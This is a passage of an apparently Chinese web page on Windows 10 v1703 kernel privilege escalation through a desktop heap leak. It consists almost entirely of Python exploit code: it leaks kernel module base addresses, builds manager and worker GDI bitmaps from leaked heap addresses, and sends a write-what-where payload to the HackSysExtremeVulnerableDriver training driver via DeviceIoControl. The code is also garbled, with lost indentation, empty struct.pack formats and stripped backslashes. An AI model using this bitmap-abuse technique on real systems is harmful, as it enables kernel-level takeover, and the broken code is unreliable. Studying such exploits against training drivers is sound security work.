服务器桌面提权,Windows10 v1703基于桌面堆泄露的内核提权技术

# Call NtQuerySystemInformation second time with right size

system_information = create_string_buffer(systeminformationlength.value)

ntdll.NtQuerySystemInformation(11, system_information, len(system_information), byref(systeminformationlength))

# Read first 4 bytes which contains number of modules retrieved

module_count = c_ulong(0)

module_count_string = create_string_buffer(system_information.raw[:8])

ctypes.memmove(addressof(module_count), module_count_string, sizeof(module_count))

# Marshal each module information and store it in a dictionary

system_information = create_string_buffer(system_information.raw[8:])

for x in range(module_count.value):

smi = SYSTEM_MODULE_INFORMATION()

temp_system_information = create_string_buffer(system_information.raw[sizeof(smi) * x: sizeof(smi) * (x+1)])

ctypes.memmove(addressof(smi), temp_system_information, sizeof(smi))

module_name =  smi.FullPathName.split('\')[-1]

modules[module_name] = smi

#debug_print ("rn[+] NtQuerySystemInformation():")

# Get base addresses and return them in a list

base_addresses = []

for input_module in input_modules:

try:

base_address = modules[input_module].ImageBase

#debug_print ("t[-] %s base address: 0x%X" % (input_module, base_address))

base_addresses.append(base_address)

except:

base_addresses.append(0)

return base_addresses

def main():

global hManager

global hWorker

hevDevice = kernel32.CreateFileA("\\.\HackSysExtremeVulnerableDriver",0xc0000000,0,None,0x3,0,None)

if not hevDevice or hevDevice == -1:

print "[-] Couldn't get Device Driver handle."

sys.exit(0)

findHMValidateHandle()

debug_print ("[>] Setting up Manager Bitmap:")

debug_print ("t[+] Allocating and Freeing Windows")

dup_address = alloc_free_windows()

dwReturn = c_void_p()

gdi32.CreateBitmap.restype = HBITMAP

hManager = gdi32.CreateBitmap(0x100, 0x6D, 1, 0x1, dwReturn) # Win10x64RS2 size = 0x1020

debug_print ("t[+] Manager Bitmap handle: 0x%X" % hManager)

hManager_pvscan0_off = dup_address + 0x50

debug_print ("t[+] Manager bitmap pvscan0 offset: 0x%X" % hManager_pvscan0_off)

debug_print ("[>] Setting up Worker Bitmap:")

debug_print ("t[+] Allocating and Freeing Windows")

dup_address = alloc_free_windows()

dwReturn = c_void_p()

gdi32.CreateBitmap.restype = HBITMAP

hWorker = gdi32.CreateBitmap(0x100, 0x6D, 1, 0x1, dwReturn) # size = 0x1020

debug_print ("t[+] Worker Bitmap handle: 0x%X" % hWorker)

hWorker_pvscan0_off = dup_address + 0x50

debug_print ("t[+] Worker bitmap pvscan0 offset: 0x%X" % hWorker_pvscan0_off)

write_where = struct.pack("", hManager_pvscan0_off)

write_what_object = struct.pack("", hWorker_pvscan0_off)

write_what_object_ptr = id(write_what_object) + 0x20

write_what_final = struct.pack("", write_what_object_ptr)

buf = write_what_final + write_where

buflen = len(buf)

kernel32.DeviceIoControl(hevDevice,0x22200B,buf,buflen,None,0,byref(c_ulong()),None)

kernelImage = "ntoskrnl.exe"

kernelImageBase = find_kernelBase(kernelImage.split())[0]

kernel32.LoadLibraryA.restype = HMODULE

hKernelImage = kernel32.LoadLibraryA(kernelImage)
